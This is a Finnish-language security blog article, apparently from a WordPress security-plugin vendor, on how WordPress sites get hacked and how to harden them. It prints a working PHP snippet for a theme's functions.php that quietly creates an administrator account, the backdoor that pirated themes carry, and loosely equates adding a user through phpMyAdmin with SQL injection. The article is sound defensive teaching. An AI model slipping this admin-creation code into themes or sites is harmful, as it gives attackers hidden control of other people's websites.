Miten hakkerit voivat hakkeroida WordPress-sivuston & miten estää se?

Ennen kuin alamme näyttää, miten ja miksi hakkerit hakkeroivat sivustoja, sinun on ymmärrettävä WordPress-sivuston rakenne. Se koostuu tiedostoista ja tietokannasta. WordPress-tiedostot sisältävät enimmäkseen kaikki asetukset ja määritykset, kun taas tietokanta tallentaa kaikki tiedot viesteistä, kommenteista, käyttäjistä ja joukosta muita asioita.

Kummatkin elementit tarvitaan verkkosivustosi etusivun luomiseen. Mutta hakkerit voivat myös hyödyntää molempia.

Katsotaan ensin, miten hakkerit pääsevät WordPress-sivustojen sisälle.

Huomautus: Tämä ei ole opas WordPress-sivuston hakkerointiin. Se on opettavainen artikkeli, jossa näytetään, miten hakkerit voivat hyödyntää haavoittuvuuksia hakkeroidakseen sivustosi. Tästä huolimatta aloitetaan.

6 yleistä haavoittuvuutta, joiden avulla hakkerit voivat hakkeroida WordPress-sivustoja

Hakkeroidakseen verkkosivuston, sillä pitäisi olla haavoittuvuuskohta. Olemme listanneet WordPress-sivustoista löytyvät yleiset haavoittuvuudet:

Vanhentuneen WordPress-asennuksen käyttäminen

Vuoden 2018 raportin mukaan noin 44 % hakkeroiduista WordPress-sivustoista toimi vanhentuneilla asennuksilla. Verkkosivuston omistajana näet, että WordPress-asennukseen on saatavilla usein päivityksiä, esimerkiksi näin:

Yleensä päivitykset tuovat mukanaan uusia ominaisuuksia, korjaavat virheitä tai ratkaisevat yhteensopimattomuusongelmia. Joskus ne sisältävät myös WordPressin tietoturvakorjauksia. Tämä tarkoittaa sitä, että jos ohjelmistossa on havaittu tietoturva-aukko, kehittäjät korjaavat sen nopeasti ja julkaisevat päivityksen, joka poistaa virheen.

Kun se on julkaistu, wp:n tietoturva-aukon olemassaolosta kerrotaan julkisesti. Hakkerit etsivät sitten sivustoja, jotka eivät ole päivittäneet, löytävät puutteen ja käyttävät sitä murtautuakseen sivustolle.

Jos siis päätät olla päivittämättä WordPress-asennustasi, et ole asentanut uusia tietoturvaominaisuuksia ja annat sivustosi tarjottimella hakkereille.

Pitäkää WordPress-sivustonne aina ajan tasalla.

Vinkki: Tietoturvaparannukset julkaistaan pieninä päivityksinä. Huomaat, että kyseessä on merkittävä päivitys, jos se on V5.2 tai V5.3. Pieni päivitys olisi esimerkiksi V5.2.1. Oletusarvoisesti pienet päivitykset ovat automaattisia, mutta voit kytkeä sen pois päältä. Suosittelemme pitämään automaattisten päivitysten vaihtoehdon päällä pieniä päivityksiä varten.

Lisäosien, teemojen ja ytimen päivittämisen lisäksi suosittelemme vahvasti, että pidät WordPress-suolat ja suojausavaimet ajan tasalla.

Heikkojen tunnistetietojen käyttäminen

Toinen yleinen sisäänpääsykeino hakkereille ovat heikot tunnistetiedot. Hakkerit käyttävät brute force -hyökkäyksiksi kutsuttua menetelmää, jossa he ohjelmoivat botteja etsimään internetissä olevia WordPress-sivustoja ja yrittävät murtautua sivustolle erilaisilla käyttäjätunnusten ja salasanojen yhdistelmillä.

Jos olet jättänyt kirjautumisnimeksi ’admin’, he ovat jo askeleen lähempänä pääsyä sivustollesi. Jos olet kuitenkin käyttänyt yleisiä salasanoja, kuten ’password123’, heidän on helppo arvata se. Nämä botit voivat tehdä tuhansia, ellei jopa miljoonia hakkerointiyrityksiä vain sekunnissa (suositeltava luku – WordPressin kirjautumissivun suojausopas).

Suosittelemme salasanan vaihtamista salasanalauseeksi yhdistettynä numeroihin ja symboleihin, jotta salasanasta tulee vahva kuin koskaan näin:

Piraattiteemojen asentaminen

Premium-teemat ovat houkuttelevia, ja me kaikki haluaisimme mielellämme upean teeman verkkosivuillemme tehdäksemme niistä ainutlaatuiset. Monesti verkkosivustojen omistajat joutuvat näiden teemojen ilmaisten, halkaistujen tai piraattiversioiden uhriksi. Tällaiset epäluotettavista lähteistä peräisin olevat teemat voivat sisältää esiasennettuja haittaohjelmia. Asentamalla sen WordPress-sivustollesi asennat myös haittaohjelman. Tämä avaa oven hakkereille. Kerromme myöhemmin yksityiskohtaisesti, miten tämä tapahtuu.

Lataa teemoja aina vain luotettavista lähteistä, kuten WordPress-varastosta tai markkinapaikoista, kuten ThemeForestista ja ThemeTrustista.

Haavoittuvien lisäosien käyttäminen

Hakkerit ovat jatkuvasti liikkeellä löytääkseen aukkoja lisäosien tietoturvassa. Jos he löytävät sellaisen, he etsivät internetistä WordPress-sivustoja, joihin on asennettu kyseinen lisäosa. Näin he pystyvät hakkeroimaan tuhansia verkkosivustoja muutamassa minuutissa.

Monesti, erityisesti ilmaisten lisäosien kehittäjät saattavat huomata, etteivät he pysty enää ylläpitämään sitä, ja hylkäävät lisäosan. (Näin voi tapahtua myös teemojen kanssa). Näissä tapauksissa laajennuksen tietoturva raukeaa ja sen asentaminen sivustollesi muodostaa uhan.

Lataa laajennuksia vain luotettavista lähteistä, kuten WordPress-tietovarastosta tai CodeCanyonista. Poista säännöllisesti WordPress-lisäosia ja teemoja, joita et enää käytä. Tarkista käyttämiesi lisäosien tila, jotta näet, päivittääkö ja ylläpitääkö kehittäjä niitä.

Turvattoman paikallisen järjestelmän käyttäminen

Joskus se voi olla itse tietokoneesi, joka ei ole turvallinen. Jos joku murtautuu järjestelmääsi, hän pääsee helposti käsiksi WordPress-sivustoosi, koska useimmissa tapauksissa wp-admin on jo kirjautuneena sisään ja auki.

Tämä voi tapahtua, jos järjestelmääsi ei ole asennettu palomuuria tai haittaohjelmien torjuntatyökalua.

Suositellaan, ettet koskaan käytä julkista tietokonetta tai julkista, suojaamatonta wifi-yhteyttä paikallisessa järjestelmässäsi, jota käytät WordPress-verkkosivustosi käyttämiseen. Pidä haittaohjelmien tunnistustyökalut aina aktiivisina sivustollasi.

Puutteellisen webhosting-palvelun käyttäminen

Valittaessa hosting-pakettia meillä on tapana etsiä halvinta. Halvin ei kuitenkaan aina takaa hyviä turvatoimia.

Jakopalvelimet voivat olla halvempia, mutta ne myös vaarantavat sivustosi. Et voi tietää, minkä sivustojen kanssa jaat verkkopalvelimen ja ovatko ne ottaneet käyttöön tietoturvaprotokollia. Jos ne hakkeroidaan, on mahdollista, että haittaohjelmatartunta voi levitä myös sinun sivustollesi.

On myös tilanteita, joissa verkkosivujen isännät ovat vaarassa, mikä tarkoittaa, että kaikki isännöintialustalla olevat verkkosivut ovat alttiina hakkerien hyödynnettäväksi.”

Lue ennen verkkosivujen isännän valintaa, mitä he tarjoavat ja mitä asiakkaat sanovat heistä. Tämä auttaa sinua saamaan hyvän käsityksen siitä, minkä verkkoisännän valitset.

Hakkerit luovat haavoittuvien sivustojen löytämiseksi omia bottejaan tai käyttävät netissä saatavilla olevia ilmaisia haavoittuvuusskannereita haravoidakseen internetiä. Kun he löytävät sellaisen, he hyödyntävät siinä olevaa tietoturva-aukkoa (kuten edellä mainittuja) päästäkseen käsiksi WordPress-sivuston tiedostoihin tai tietokantaan.

Sitten he ruiskuttavat koodia, joka suorittaa haitallisia toimintoja, kuten roskapostin lähettämistä, laittomien tuotteiden myymistä jne. He myös ruiskuttavat koodia luodakseen uusia käyttäjätilejä tai WordPress-taustaportteja, joiden avulla he voivat saada takaisin pääsyn sivustollesi milloin tahansa.

Miten WordPress-sivuston hakkerointi onnistuu?

On olemassa lukemattomia tapoja murtautua WordPress-sivustolle. Tässä keskustelemme kahdesta yleisimmästä tavasta, joilla hakkerit syöttävät koodia sivustoosi luodakseen uuden käyttäjätunnuksen:

I. Tiedostojen kautta (esiasennettu haittaohjelma piraattiteemassa)

Kuten aiemmin keskustelimme, monet WordPress-sivuston omistajat joutuvat piraattiteemojen uhriksi. Saat kaikki ominaisuudet ilmaiseksi! Mutta tällaisessa ohjelmistossa voi olla skripti, joka luo uuden kirjautumistunnuksen. Kun asennat teeman, uusi käyttäjätunnus luodaan ja hakkeri voi yksinkertaisesti kirjautua verkkosivustollesi WordPressin ylläpidosta.

Näytämme, miten voit luoda uuden käyttäjätunnuksen WordPress-sivustollesi teematiedoston avulla. Tämä auttaa sinua ymmärtämään, miten piraattiteemat auttavat hakkeria pääsemään sivustollesi.

Vinkki: Tämä voi olla kätevää myös silloin, jos sinut on lukittu ulos wp-administa, mutta sinulla on silti pääsy webhosting-tilillesi.

Varoitus:

WordPress-sivuston kulissien taakse meneminen on riskialtista. On parasta tehdä tämä testi- tai staging-sivustolla. Jos päätät tehdä sen live-sivustollasi, varmista, että otat luotettavan varmuuskopion. Jos jokin menee pieleen, voit palauttaa WordPress-varmuuskopiosi.

Vaihe 1: Kirjaudu sisään WordPress-hosting-tilillesi. Siirry cPaneliin ja avaa Tiedostonhallinta.

Voit käyttää tiedostoja myös FTP-asiakasohjelman, kuten FileZillan, kautta käyttämällä FTP-tunnuksia.

Vaihe 2: WordPress-tiedostosi sijaitsevat yleensä kansiossa nimeltä public_html. Sen sisällä pääset wp_content/themes.

Vaihe 3: Täältä sinun on valittava sivustollasi aktiivinen teema ja muokattava functions.php.

Vaihe 4: Kopioi ja liitä seuraava koodi tiedoston loppuun. (Jos koodissa on päättävä tagi kuten näin ?>, varmista, että koodi tulee tätä edeltävälle riville.)

$new_user_email = ’[email protected]’;
$new_user_password = ’password’;
if(!username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(’ID’ => $user_id, ’nickname’ => $new_user_email));
$user = new WP_User($user_id);
$user->set_role(’administrator’);
}
Muokkaa kahteen ensimmäiseen riviin haluamasi sähköpostiosoite ja salasana. Kun tallennat tiedoston ja avaat verkkosivustosi, koodi toimii ja voit kirjautua sisään näillä uusilla tunnuksilla.

Toivomme, että ymmärrät nyt, että kun asennat piraattiteeman, jos siinä on tämä koodilohko, luodaan uusi käyttäjätili. Hakkerin tarvitsee vain syöttää tunnukset ja kirjautua sisään.

II. Tietokannan kautta – SQL Injection

Tämä on toinen yksi yleisimmistä syistä, miksi WordPress-sivustoja hakkeroidaan. Aluksi sinun on tiedettävä kaksi asiaa SQL-injektioista:

• • WordPress käyttää oletustietokantajärjestelmänä MySQL:ää.
  • Sivuston etusivun luomiseksi WordPress käyttää SQL-kyselyjä tietojen hakemiseen tietokannasta.

Meidän ei tarvitse huolehtia siitä, mitä tämä on tai mitä yksityiskohtia se sisältää toistaiseksi. Se, mitä sinun täytyy tietää, on se, että tähän tietokantaan pääsee käsiksi vain cPanel > phpMyAdminin kautta. Mutta hakkerit löytävät keinoja päästä siihen käsiksi ilman cPanelia. Yksi yleisimmistä tavoista, joilla hakkerit pääsevät käsiksi sivuston tietokantaan, on verkkosivuston haavoittuvien lomakkeiden kautta.

Lomake on mikä tahansa elementti, johon voi syöttää tekstiä, kuten WordPressin kirjautumispalkki, yhteydenottolomake, WordPress-blogin kommentit, tilauksen ponnahdusikkunat, kassasivut ja sivuston hakupalkki.

Lomakkeessa kysyttyjen yksityiskohtien syöttämisen sijaan hakkeri syöttäisi haitallista tietoa sisältäviä SQL-käskyjä. Koska kaikki lomakkeeseen syötetyt tiedot tallentuvat tietokantaasi, tämä haitallinen koodi löytää tiensä sinne.

Koska selitämme, miten tämä tapahtuu, näytämme, miten luodaan uusi käyttäjätili tietokantaasi käyttäen.

→ Uuden käyttäjätilin luominen tietokannan kautta

Vaihe 1: Siirry cPaneliin ja avaa phpMyAdmin > Tietokannat.

Vaihe 2: Täältä näet luettelon tietokannoista. Sinun on valittava tietokantasi. (Jos et tiedä tietokantasi nimeä, voit selvittää tämän tiedon wp-config-tiedostostasi esimerkiksi näin).

Olemme valinneet tietokannan wp-config-tiedostossa olevan nimen mukaan.

Vaihe 3: Seuraavaksi oikeaan paneeliin ponnahtavista taulukoista on löydettävä taulukko, jonka pääte on _users (Todennäköisesti sen nimi on wp_users).

Vaihe 4: Tässä voit napsauttaa ”Insert” (Lisää) -painiketta.

Vaihe 5: Se avaa seuraavan ruudun, johon voit syöttää käyttäjän kirjautumisnimen, salasanan, sähköpostiosoitteen ja näyttönimen.

Vaihe 6: Seuraavaksi napsauta ’Go’ ja muutokset tallennetaan. Nyt voit kirjautua WordPressiin uusilla tunnuksilla.

Saman voi tehdä lisäämällä SQL-koodilohkon tietokantaan. Samoin kuin piraattiteemassa, kun koodi tulee tietokantaan, se suoritetaan ja uusi käyttäjä luodaan. Voimme ajatella, että hakkeri yksinkertaisesti luo oman oven kotiisi ja kävelee suoraan sisään.

Miten estää hakkereita murtautumasta verkkosivustollesi?

On neljä päävaihetta, jotka sinun on otettava, jotta sivustosi on tarpeeksi turvallinen pitämään hakkerit loitolla:

Asenna WordPressin tietoturvaliitännäinen

Jokainen WordPress-verkkosivusto tarvitsee tietoturvaliitännäisen, kuten MalCaren. Suojaa WordPress-sivustosi tällaisella lisäosalla, joka skannaa sivuston säännöllisesti. Se havaitsee kaiken epäilyttävän toiminnan, estää haitallisen liikenteen ja pitää hakkerit poissa. Jos hakkeri pääsee sisään, saat välittömästi hälytyksen ja voit siivota sivustosi välittömästi ennen kuin he ehtivät tehdä vahinkoa.

Asenna SSL-varmenne

Tämä varmenne tarjoaa sivustollesi tietojen salauksen. Tämä tarkoittaa sitä, että kun joku vierailee verkkosivustollasi, tiedot siirretään hänen tietokoneensa ja verkkosivustosi palvelimen välillä.

Jos tiedot siirretään pelkkänä tekstinä, joskus ympärillä vaanivat hakkerit voivat napata nämä tiedot. He voivat lukea sen, varastaa sen tai muokata sitä mieleisekseen.

Mutta jos se on salattu, vaikka hakkeri saisi sen haltuunsa, hän ei pysty purkamaan sitä.

Voit hankkia SSL-varmenteen verkkoisännältäsi tai SSL-palveluntarjoajalta. Jos olet huolissasi siitä, että haluat käyttää varmenteeseen liikaa rahaa, palveluntarjoajat, kuten LetsEncrypt, tarjoavat ilmaista SSL:ää.

Jos haluat oppia, miten SSL-varmenne asennetaan, tutustu tähän oppaaseen – Siirtyminen HTTP:stä HTTPS:ään.

Korjaa tunnetut haavoittuvuudet

Kuten aiemmin mainitsimme, WordPressissä on yleisiä haavoittuvuuksia. Suosittelemme, että toteutat seuraavat toimenpiteet haavoittuvuuksien minimoimiseksi.

• • WordPressin ja sen teemojen ja liitännäisten päivittämisen on oltava etusijalla.
  • Varmista, että käytät aina vahvoja sisäänkirjautumistunnuksia, jotta vältät bruteforcing-hyökkäykset.
  • Poista säännöllisesti käyttämättömät teemat ja liitännäiset
  • Älä koskaan käytä piraattituotantoisia teemoja ja laajennuksia. Lataa tällaiset ohjelmistot aina luotettavista lähteistä, kuten WordPress-tietovarastosta, CodeCanyonista tai ThemeForestista.
  • Käytä luotettavaa web-hosting-palveluntarjoajaa.
  • Pitäkää paikallinen tietokoneenne suojattuna asentamalla haittaohjelmien torjuntaohjelmat.

Kovenna WordPress-sivustosi

WordPress suosittelee, että jokainen sen alustalla toimiva verkkosivusto ryhtyy tiettyihin toimiin sivustojensa koventamiseksi. Joitakin näistä toimenpiteistä ovat mm:

• Pitäkää WordPressin palomuuri aktiivisena. Tämä auttaa estämään kirjautumisyritysten määrän rajoittamisen. Jokainen käyttäjä saa vain kolme mahdollisuutta syöttää tunnukset oikein, minkä jälkeen hänen on valittava ’Unohdin salasanan’ tai otettava yhteyttä ylläpitäjään. Voit käyttää samaa MalCare-lisäosaa tämän vaiheen toteuttamiseen.
• Lisäosien asennusten poistaminen käytöstä, jos sivustolla työskentelee useita käyttäjiä. Haluat varmistaa, ettei kukaan asenna lisäosaa vapaasti tarkistamatta, ovatko ne luotettavia ja luotettavia sivustollesi. Tämä voidaan tehdä manuaalisesti muokkaamalla tiedostoa nimeltä wp-config.php WordPress-asennuksessasi. Voit myös käyttää tähän MalCare-lisäosaa.

• 2-tekijätodennuksen käyttöönotto kirjautuvan henkilön todentamiseksi. Tämä tapahtuu lähettämällä kertakäyttösalasana rekisteröityyn kännykkään tai sähköpostiin tai käyttämällä Google Authenticatorin kaltaisia sovelluksia, jotka luovat reaaliaikaisen salasanan 30 sekunnin välein.

On monia muitakin tapoja, joilla voit koventaa verkkosivustoasi. On suositeltavaa toteuttaa nämä vaiheet verkkosivustosi vaatimusten mukaisesti.

Sen lisäksi voit toteuttaa muutamia muita turvatoimia. Suosittelemme vahvasti seuraamaan tätä opasta – Secure Your WordPress Site With wp-config.php.

Loppuajatuksia

Toivomme, että tämä artikkeli on antanut sinulle paremman käsityksen siitä, miten haavoittuvuudet voivat näkyä verkkosivustollasi ja miten hakkerit pääsevät sisään. Hakkerit eivät ole puolueellisia ja ottavat kohteekseen lähes minkä tahansa sivuston. Jos sivustosi on haavoittuvainen, on todella suuri mahdollisuus, että sinut hakkeroidaan.

Siten yhteenvetona suosittelemme haavoittuvuuksien minimoimista, tietoturvaliitännäisen asentamista ja sivustosi koventamista, jotta hakkerit eivät pääse sivustollesi.

Pitäkää sivustosi turvallisena MalCaren tietoturvaliitännän avulla!